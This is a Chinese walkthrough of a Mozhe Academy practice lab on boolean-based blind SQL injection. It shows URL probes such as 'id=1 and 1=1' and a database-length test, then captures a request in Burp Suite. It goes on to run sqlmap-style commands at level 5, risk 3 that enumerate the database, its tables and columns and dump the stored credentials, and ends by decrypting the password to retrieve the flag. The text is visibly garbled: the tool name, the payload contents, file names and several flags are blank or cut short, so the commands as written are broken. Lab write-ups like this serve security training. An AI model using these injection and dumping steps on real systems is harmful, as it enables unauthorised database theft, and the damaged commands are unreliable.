布尔盲注 墨者学院——SQL注入漏洞测试

本次靶场操作步骤来源于 CSDN-吃肉唐僧
本次靶场使用系统和kali Linux系统
1.点击页面进去 , 发现浮动的通告进度条 , 找到SQL注入点
2.在地址栏中输入:/.php?id=1' and 1=1 , 这样页面就变成空白的了
3.输入/.php?id=1 and 1=1,内容显示 ,  判断这个id的值类型是数字类型
4.然后开始判断数据库名字的长度 , /.php?id=1 and (())=1 , 内容空白 。一直试 , 试到长度为10
首先这里确定了这个数据库的长度(10)和类型(数字型) , 接下来就用bp抓网页内容
5.在kali终端新建一个后缀名为.txt的文件 , 然后打开bp , 将在网页上打开的通知网页的URL复制在bp上进行抓包 , 将下面的内容复制并保存在.txt文件里面
这里主要说一下就是 , 我们访问的是静态网页 , 所以每次抓到的都是一样的内容 , 如果说设置的浏览器(我这里的浏览器是)不一样 , 你可以对比一下我抓到的内容有没有什么不一样
【布尔盲注墨者学院——SQL注入漏洞测试】6.回到kali终端 , 输入查找数据库的命令: -r *.txt(新建的文本文件) --level 5 --risk 3 --dbs --dbms mysql --batch

布尔盲注  墨者学院——SQL注入漏洞测试

文章插图
7.接着向下 , 找数据库里面的数据表: -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -- --batch
8.接着来查找表的字段: -r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -- --dbms mysql --batch
9.最后看字段值:-r *.txt(新建的文本文件) --level 5 --risk 3 -D 数据库名 -T 表名 -C (字段1 , 字段2 , ....) --dump --dbms mysql --batch
最后的最后将密码解密一下 , 然后回到登录网页 , 就能看到Key , 然后提交